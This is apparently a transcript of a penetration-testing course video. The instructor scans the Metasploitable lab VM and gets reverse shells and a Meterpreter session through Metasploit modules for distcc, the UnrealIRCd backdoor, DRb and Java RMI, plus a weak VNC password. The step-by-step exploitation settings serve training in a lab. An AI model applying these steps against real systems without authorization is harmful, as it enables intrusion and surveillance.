1 00:00:00,630 --> 00:00:07,470 OK, it is time for a small challenge. We can see we are getting more and more familiar with msfconsole
2 00:00:07,470 --> 00:00:14,100 and exploitation, and by now you should be familiar with the entire process of searching for a vulnerability
3 00:00:14,250 --> 00:00:15,700 and trying to exploit it.
4 00:00:16,560 --> 00:00:18,630 Let's put all of that to the test.
5 00:00:19,380 --> 00:00:25,290 So far we covered about four to five vulnerabilities on the Metasploitable virtual machine.
6 00:00:26,270 --> 00:00:32,420 And what I want you to do in this video is find three different vulnerabilities that will give you
7 00:00:32,420 --> 00:00:34,610 a shell back on the target machine.
8 00:00:35,810 --> 00:00:42,200 You can use any tools that you want, besides searching for links that will give you the exact steps to
9 00:00:42,200 --> 00:00:47,820 exploiting the vulnerability, and feel free to use Google if you want to, to see if a software is vulnerable.
10 00:00:48,050 --> 00:00:51,800 You can also use searchsploit to see whether you have it in your database.
11 00:00:52,370 --> 00:00:56,150 You can use Nmap to scan and the Metasploit framework to exploit.
12 00:00:57,120 --> 00:01:04,350 After we do this challenge, we are ready to move on to some harder Windows exploits, and after that,
13 00:01:04,350 --> 00:01:11,310 we're going to see how to exploit the target without using msfconsole and without having an exploit available
14 00:01:11,310 --> 00:01:13,430 inside of our Kali Linux machine.
15 00:01:14,430 --> 00:01:15,130 OK, great.
16 00:01:15,480 --> 00:01:22,290 So for this video right now, give yourself 10 to 20 minutes and try to find three different vulnerabilities
17 00:01:22,530 --> 00:01:25,340 on the Metasploitable that will give you a shell back.
18 00:01:26,010 --> 00:01:27,900 I myself will do it right now.
19 00:01:28,050 --> 00:01:33,610 So if you don't want me to spoil it for you, then try to find them first and then watch this video.
20 00:01:34,020 --> 00:01:35,700 The harder part is to find them.
21 00:01:35,910 --> 00:01:38,730 However, once you find them, it is easy to exploit them.
22 00:01:39,570 --> 00:01:41,160 Let's get straight into it.
23 00:01:42,280 --> 00:01:46,750 Let's start by scanning the target for all the open ports and its services.
24 00:01:46,990 --> 00:01:53,860 So what I'm going to do is I will perform the usual Nmap version scan on my Metasploitable, and
25 00:01:54,070 --> 00:01:57,790 -p-, which stands for scan all sixty five thousand ports.
26 00:01:58,450 --> 00:02:01,450 If I press enter here, and enter my password.
27 00:02:02,000 --> 00:02:07,020 And by the way, of course, the vulnerabilities that we covered don't count at the moment.
28 00:02:07,330 --> 00:02:09,180 We will not pay attention to them at all.
29 00:02:09,190 --> 00:02:12,790 Right now we want to find new vulnerabilities.
30 00:02:13,240 --> 00:02:22,270 So while this scan is working, I will go to a second terminal and I will start the msfconsole, and I will also
31 00:02:22,270 --> 00:02:28,000 open a third terminal in case we need something like a third exploit or some other tool to run right
32 00:02:28,000 --> 00:02:28,240 here.
33 00:02:28,750 --> 00:02:31,540 So the goal is to find three vulnerabilities.
34 00:02:31,990 --> 00:02:35,380 Let's see after our scan finishes whether we manage to do so.
35 00:02:36,900 --> 00:02:42,810 And here are the results of the scan, so we got a bunch of ports open as usual, and let's go and pick
36 00:02:42,810 --> 00:02:43,550 any one of them.
37 00:02:44,720 --> 00:02:52,480 For example, I know for a fact that this distcc open port, which is 3632, is vulnerable.
38 00:02:52,760 --> 00:02:54,980 It is running distcc version one.
39 00:02:55,640 --> 00:03:04,370 And if I go to my Metasploit framework and I just type search distcc, I will only get one exploit available.
40 00:03:05,090 --> 00:03:08,660 distcc exec, or DistCC Daemon Command Execution.
41 00:03:09,200 --> 00:03:10,600 It is ranked excellent.
42 00:03:10,940 --> 00:03:20,430 So since this is the only exploit, let's give it a try. I copy it, I type use and then paste the exploit
43 00:03:20,450 --> 00:03:22,130 name, clear the screen.
44 00:03:22,760 --> 00:03:25,430 We can show info just to know what this exploit does.
45 00:03:25,430 --> 00:03:32,270 And it says that this module uses a documented security weakness to execute arbitrary commands on any
46 00:03:32,270 --> 00:03:39,950 system running distccd, and our system is indeed running distccd.
47 00:03:40,670 --> 00:03:47,030 So what we're going to do is we're going to type show options and set the RHOSTS to be the IP address
48 00:03:47,300 --> 00:03:51,130 of our Metasploitable. Let's see payloads.
49 00:03:52,100 --> 00:03:54,110 So we got quite a few payloads right here.
50 00:03:54,410 --> 00:03:57,790 Let us use this one, cmd/unix/reverse.
51 00:03:57,950 --> 00:04:00,260 So this is reverse TCP over Telnet.
52 00:04:00,590 --> 00:04:06,680 Let's set it right here, since at the moment if I show options, we don't have any payload set up.
53 00:04:07,460 --> 00:04:14,600 Let's set payload cmd/unix/reverse, show options once again.
54 00:04:15,260 --> 00:04:22,520 Now we need to set the LHOST, so I will type sudo ifconfig, enter my password, my IP address is
55 00:04:22,520 --> 00:04:24,810 192.168.1.8.
56 00:04:25,760 --> 00:04:31,820 Let's copy it and let's set LHOST to be equal to that IP address.
57 00:04:33,200 --> 00:04:37,810 Now if we triple check all of our available options, we should be good to go.
58 00:04:38,090 --> 00:04:39,920 Let us run our exploit.
59 00:04:42,600 --> 00:04:49,760 And here it is, first one is over, we got the command shell session one opened on the target machine.
60 00:04:50,280 --> 00:04:53,850 If I type whoami, we are daemon. If I type ls,
61 00:04:54,990 --> 00:05:01,110 or pwd, print working directory, we are in this directory. The hostname command will tell us that we are at
62 00:05:01,110 --> 00:05:07,960 Metasploitable, and uname -a will tell us that we are Linux Metasploitable 2.6.24.
63 00:05:08,430 --> 00:05:13,800 And here we also get some other information, such as the date and which version of Linux.
64 00:05:13,800 --> 00:05:15,420 It is great.
65 00:05:15,900 --> 00:05:17,550 So first one is done.
66 00:05:17,880 --> 00:05:26,430 Let us Ctrl+C this, abort session one, yes, and let's go back to our scan to find another vulnerability.
67 00:05:27,730 --> 00:05:34,900 So if you remember, during our scans, once you performed the vulnerability scan, we noticed that this
68 00:05:34,900 --> 00:05:42,610 UnrealIRCd was vulnerable. We got from some of our scan results that this specific service is
69 00:05:42,610 --> 00:05:44,320 vulnerable to some type of attack.
70 00:05:45,010 --> 00:05:46,510 So let's give it a try.
71 00:05:46,780 --> 00:05:52,720 Let's go to our terminal and type searchsploit IRC.
72 00:05:53,820 --> 00:06:00,450 And this gives us a bunch of different information, so this isn't really useful for us.
73 00:06:01,170 --> 00:06:02,330 Let's try it like this.
74 00:06:02,370 --> 00:06:07,050 Let's go to our scan and copy UnrealIRCd, which is the version.
75 00:06:07,800 --> 00:06:11,550 And now if we type searchsploit and then the name of the version.
76 00:06:13,040 --> 00:06:20,180 Well, we narrow it down to four results, and one of them doesn't count since it is remote denial-of-service.
77 00:06:21,160 --> 00:06:26,190 Out of all of this, we got one marked Metasploit, which means it belongs to the Metasploit framework.
78 00:06:26,680 --> 00:06:31,690 It is 3.2.8 and it is backdoor command execution.
79 00:06:32,920 --> 00:06:39,130 Let's search it inside our framework, so search and then unreal irc.
80 00:06:40,160 --> 00:06:43,260 And we do get indeed only one exploit for this.
81 00:06:43,280 --> 00:06:46,560 It is ranked excellent and it is from 2010.
82 00:06:47,210 --> 00:06:47,960 Let's copy it.
83 00:06:49,880 --> 00:06:59,870 Right here, copy selection, and as usual, use this exploit. Show info will tell us that this module
84 00:06:59,870 --> 00:07:06,590 exploits a malicious backdoor that was added to the UnrealIRCd 3.2.8 download
85 00:07:06,590 --> 00:07:07,190 archive.
86 00:07:07,770 --> 00:07:13,430 So as it says, this module will exploit some malicious backdoor that was added in the specific version.
87 00:07:13,920 --> 00:07:22,670 And if we show options, we need to set the RHOSTS as in the previous exploit, and we also need to set
88 00:07:22,670 --> 00:07:23,440 the payload.
89 00:07:23,450 --> 00:07:26,480 But before we set it, let's show our available payloads first.
90 00:07:27,940 --> 00:07:33,190 Show payloads, pardon me, not show options, and we get the same result as previously, so we are just
91 00:07:33,190 --> 00:07:36,280 going to go with the reverse TCP over Telnet.
92 00:07:39,270 --> 00:07:45,900 And if I type set payload and then paste the payload name, now we need to set the LHOST to be the
93 00:07:45,900 --> 00:07:52,320 IP address of our Kali Linux machine, and if we triple check our options, everything is set to run.
94 00:07:55,930 --> 00:08:02,400 And here it is, command shell session two opened, we got the second exploit down.
95 00:08:03,010 --> 00:08:04,340 Let's check out if it works.
96 00:08:04,360 --> 00:08:04,870 whoami?
97 00:08:05,170 --> 00:08:09,460 We are a different account. hostname will tell us we're on Metasploitable.
98 00:08:09,640 --> 00:08:11,510 So this is the second one down.
99 00:08:12,040 --> 00:08:13,960 We got one more left to go.
100 00:08:14,560 --> 00:08:19,210 Let's Ctrl+C this, go back to our scan.
101 00:08:19,720 --> 00:08:25,990 And we are doing this at a really fast tempo because we already are familiar with all of these tools and
102 00:08:25,990 --> 00:08:29,230 techniques that we use to exploit this vulnerable software.
103 00:08:30,300 --> 00:08:35,140 If you didn't manage to find three different exploits, don't worry, this comes with practice.
104 00:08:35,340 --> 00:08:40,600 So after some time practicing, you will be able to find even more than three exploits.
105 00:08:41,460 --> 00:08:43,400 Let's continue on to the third one.
106 00:08:44,040 --> 00:08:50,700 So if we go down here and check out what different services we got running, this one, which is running
107 00:08:50,700 --> 00:08:57,590 over port 8787 running service DRb, I know for a fact that it is vulnerable,
108 00:08:58,380 --> 00:08:59,720 so let's give it a try.
109 00:09:00,120 --> 00:09:01,800 The service name is DRb.
110 00:09:02,310 --> 00:09:05,970 See if I type in my searchsploit DRb.
111 00:09:07,280 --> 00:09:13,880 Well, we only get these results right here, and it doesn't seem that any one of them belongs to the
112 00:09:13,880 --> 00:09:17,830 Metasploit framework, as we can see right here, since these are Python files.
113 00:09:18,500 --> 00:09:21,560 So let's just double check whether it's not here.
114 00:09:22,220 --> 00:09:23,690 Let's just double check right here.
115 00:09:23,810 --> 00:09:28,720 If we can find something regarding DRb, and we do manage to find it.
116 00:09:29,450 --> 00:09:38,960 So we got these two exploits which are for multi, and we got this DRb remote code execution, and it
117 00:09:38,960 --> 00:09:41,840 says Distributed Ruby Remote Code Execution.
118 00:09:41,990 --> 00:09:46,210 And if we go right here under the version, we can see that it is running Ruby.
119 00:09:47,000 --> 00:09:48,860 So let's just give it a try.
120 00:09:48,890 --> 00:09:51,230 You never know. If we copy this exploit,
121 00:09:52,140 --> 00:09:56,130 which says DRb remote code execution, and we use it right here.
122 00:09:59,270 --> 00:10:00,450 Show our options.
123 00:10:00,480 --> 00:10:09,320 We can see by default it has set the payload to be cmd/unix/reverse_netcat, and we got two different
124 00:10:09,320 --> 00:10:10,250 things to set up.
125 00:10:10,850 --> 00:10:14,480 Matter of fact, one of them is URI, which is not really needed.
126 00:10:14,480 --> 00:10:16,400 So we can only set RHOSTS.
127 00:10:17,410 --> 00:10:22,360 And for some reason, it does say that RHOST is not required, but I'm not really sure how it is
128 00:10:22,360 --> 00:10:31,000 not required, so we will just specify it anyway, that RHOSTS is 192.168.1.7,
129 00:10:31,750 --> 00:10:33,890 since the payload is already being set.
130 00:10:33,970 --> 00:10:35,870 Let us just run the exploit.
131 00:10:37,430 --> 00:10:42,590 And here it is, we got command shell session three opened.
132 00:10:44,280 --> 00:10:45,570 Let's type whoami.
133 00:10:46,440 --> 00:10:51,900 We are root account, and once again, hostname will tell us we're on the Metasploitable machine.
134 00:10:52,680 --> 00:10:55,920 And with this we completed our challenge.
135 00:10:56,360 --> 00:11:00,360 We found three different vulnerabilities that gave us a shell back.
136 00:11:01,140 --> 00:11:02,610 But these are not the only ones.
137 00:11:02,850 --> 00:11:08,010 Matter of fact, let me just show you one or two more that you could have found if you performed this
138 00:11:08,010 --> 00:11:08,490 challenge.
139 00:11:09,180 --> 00:11:17,100 The one that is a little bit different to exploit is this VNC service running on port 5900.
140 00:11:17,100 --> 00:11:17,400
141 00:11:17,790 --> 00:11:19,800 It is running protocol 3.3.
142 00:11:20,340 --> 00:11:29,010 And if we just search in searchsploit, searchsploit VNC, we will get a bunch
143 00:11:29,010 --> 00:11:30,090 of results right here.
144 00:11:30,300 --> 00:11:32,460 So let's add the version 3.3.
145 00:11:33,180 --> 00:11:35,640 And we do get some of the responses right here.
146 00:11:35,850 --> 00:11:38,870 But it does say that these are for Windows.
147 00:11:39,810 --> 00:11:45,320 Now, we are not going to give up just because we cannot find the exploit using searchsploit.
148 00:11:46,310 --> 00:11:51,650 Matter of fact, it probably is somewhere right here, just there is a bunch of results and we don't
149 00:11:51,650 --> 00:11:54,800 really want to read through all of this to find the exploit that we need.
150 00:11:55,250 --> 00:11:59,120 So let's just go straight to the point and type search vnc.
151 00:11:59,780 --> 00:12:02,960 And if we scroll all the way up, since these are just payloads.
152 00:12:04,640 --> 00:12:12,470 I come to exploits, we can see there are about five or six exploits, and these four are for Windows, so
153 00:12:12,470 --> 00:12:14,410 we can forget about them straight away.
154 00:12:15,080 --> 00:12:18,720 We got this one and we got this one.
155 00:12:19,970 --> 00:12:21,510 This one seems interesting.
156 00:12:21,770 --> 00:12:27,740 It is an exploit for multiple operating systems for VNC, and it says VNC keyboard execution.
157 00:12:29,170 --> 00:12:32,080 So let's just copy the name and see whether it works.
158 00:12:32,540 --> 00:12:35,080 Now, this is just a part of a penetration test.
159 00:12:35,380 --> 00:12:40,780 If you don't know an exact exploit, you simply just try a few different ones and see if they work,
160 00:12:41,230 --> 00:12:47,110 just get used to it that some exploits will sometimes not work and you will have no idea why they don't
161 00:12:47,110 --> 00:12:47,440 work.
162 00:12:48,340 --> 00:12:54,130 So we just type set, or pardon me, just type use and then the exploit name.
163 00:12:55,820 --> 00:13:02,820 And it seems that this isn't an exploit for us, since it is also setting the Windows payload.
164 00:13:03,590 --> 00:13:06,790 Hmm, we cannot find any VNC exploit.
165 00:13:06,860 --> 00:13:07,930 So what are we going to do?
166 00:13:08,910 --> 00:13:15,090 Well, if I go right here and instead of searching for an exploit, I simply just try to connect to
167 00:13:15,090 --> 00:13:18,330 the VNC using a tool called vncviewer.
168 00:13:18,900 --> 00:13:24,280 And all I need to specify to connect to is the IP address of the target machine.
169 00:13:25,800 --> 00:13:26,510 Press enter.
170 00:13:26,910 --> 00:13:27,300 Hmm.
171 00:13:27,600 --> 00:13:29,910 It seems to be asking for a password.
172 00:13:30,510 --> 00:13:37,230 Well, let's try msfadmin, which is the usual password for everything in Metasploitable, and it tells
173 00:13:37,230 --> 00:13:39,090 us authentication failure.
174 00:13:39,690 --> 00:13:44,220 But if we try it once again, and as a password I simply just type password.
175 00:13:46,060 --> 00:13:55,000 Well, it worked, the VNC viewer password was just password, and now I got a root shell opened
176 00:13:55,150 --> 00:13:58,480 on the Metasploitable. I can execute commands right here such as
177 00:13:58,480 --> 00:14:05,040 ifconfig, such as hostname, ls, and I can see anything that is on the target machine.
178 00:14:05,470 --> 00:14:09,730 So this was a little bit different because it was due to a weak password.
179 00:14:09,730 --> 00:14:17,470 I just connected to the VNC and I typed password, and it granted me access to the shell of the Metasploitable.
180 00:14:18,250 --> 00:14:20,140 Great. To exit this,
181 00:14:20,140 --> 00:14:24,040 I can type exit and I can exit this desktop right here.
182 00:14:24,790 --> 00:14:28,360 And let me show you just one more and then we are going to end the video.
183 00:14:29,320 --> 00:14:33,400 And that one is over port 1099.
184 00:14:34,150 --> 00:14:42,790 It is running Java RMI, and if I go in my Metasploit framework and search for java_rmi.
185 00:14:44,390 --> 00:14:47,300 Well, we get two exploits right here.
186 00:14:48,490 --> 00:14:56,500 Let's try with this one first, so exploit/multi/misc/java_rmi_server, copy the exploit name, go right
187 00:14:56,500 --> 00:14:57,610 here and type use.
188 00:14:59,450 --> 00:15:04,750 It set the default payload to be java/meterpreter/reverse_tcp.
189 00:15:05,630 --> 00:15:09,560 Now this is the first time that we are encountering a Meterpreter payload.
190 00:15:10,130 --> 00:15:15,140 You will see that it is a little bit different than all the other shells that we got in the previous
191 00:15:15,470 --> 00:15:16,050 exploits.
192 00:15:16,640 --> 00:15:18,410 So if I type show options.
193 00:15:19,840 --> 00:15:25,810 There are a bunch of things that I need to set. Our payload options have already been set to the correct one,
194 00:15:26,200 --> 00:15:28,810 to the correct IP address and to the correct port.
195 00:15:29,380 --> 00:15:32,010 All we need to set right here is the RHOSTS.
196 00:15:32,800 --> 00:15:38,350 You can just leave the SRVHOST and SRVPORT to be 0.0.0.0 and
197 00:15:38,350 --> 00:15:39,030 8080.
198 00:15:39,730 --> 00:15:46,870 If I go right here and type set RHOSTS 192.168.1.7 and I run this.
199 00:15:49,330 --> 00:15:57,250 Well, here it is, we got the Meterpreter session four opened, and if you want to execute the commands,
200 00:15:57,760 --> 00:15:59,760 you can just wait for this exploit to finish.
201 00:15:59,770 --> 00:16:06,970 And even though it says right here it failed, if I type sessions, I will have the Meterpreter session four,
202 00:16:07,270 --> 00:16:10,000 and I can enter that session by typing sessions
203 00:16:10,000 --> 00:16:17,950 and then -i and then the ID of that session, which in my case is four, and I've entered the Meterpreter
204 00:16:17,950 --> 00:16:18,280 shell.
205 00:16:19,400 --> 00:16:25,120 Right here, the commands are different. To check out all of the commands that we can run with Meterpreter,
206 00:16:25,130 --> 00:16:31,190 we can type the help command, and you can see it is split into different sections, such as filesystem
207 00:16:31,190 --> 00:16:33,680 commands, such as core commands.
208 00:16:33,920 --> 00:16:39,650 And all of these commands work with the Meterpreter shell. We can download and upload files.
209 00:16:40,250 --> 00:16:44,570 We can execute a command, we can screen share.
210 00:16:44,600 --> 00:16:46,940 We can perform a screenshot of the target machine.
211 00:16:47,480 --> 00:16:52,400 We can record the microphone and many other things that we're going to check out later.
212 00:16:52,910 --> 00:17:00,260 But for now, we can use a command called shell to enter the command shell with the target machine.
213 00:17:00,380 --> 00:17:02,030 So if I type whoami once again,
214 00:17:02,450 --> 00:17:06,760 right now, I'm a root account for the IP address of the Metasploitable.
215 00:17:07,520 --> 00:17:15,110 Great, now I left this Meterpreter for the end, just so we can slowly start getting into using
216 00:17:15,230 --> 00:17:20,270 Meterpreter on our target machine. As we can see, there are a lot of commands that we can run.
217 00:17:21,080 --> 00:17:27,480 Now, in the next video, we're going to start with Windows exploitation, and in Windows exploitation
218 00:17:27,650 --> 00:17:30,260 we are most likely always going to want to open
219 00:17:30,280 --> 00:17:31,280 a Meterpreter shell.
220 00:17:32,400 --> 00:17:37,040 So that would be about it for this challenge. Once again, if you managed to find three different vulnerabilities,
221 00:17:37,050 --> 00:17:38,030 congratulations.
222 00:17:38,040 --> 00:17:41,130 If not, don't worry, this comes with practice.
223 00:17:42,300 --> 00:17:48,240 Now that we covered the Metasploitable vulnerabilities, which are rather easy, it is time to move on
224 00:17:48,240 --> 00:17:49,900 to the Windows vulnerabilities.
225 00:17:50,400 --> 00:17:51,330 See you in the next video.